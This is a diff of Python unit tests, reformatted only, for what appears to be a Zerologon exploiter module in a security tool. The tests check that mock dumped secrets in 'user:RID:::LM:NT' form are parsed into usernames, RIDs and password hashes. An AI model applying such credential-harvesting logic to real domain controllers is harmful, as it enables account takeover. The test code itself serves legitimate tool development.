@@ -71,24 +68,17 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
             "nt_hash": NT_HASHES[1],
         },
     }
-    assert (
-        zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets)
-        is None
-    )
+    assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
     assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds


 def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
     mock_dumped_secrets = [
-        f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::"
-        for i in range(len(USERS))
+        f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
     ]
     expected_extracted_creds = {
         USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
         USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
     }
-    assert (
-        zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets)
-        is None
-    )
+    assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
     assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
Some files were not shown because too many files have changed in this diff.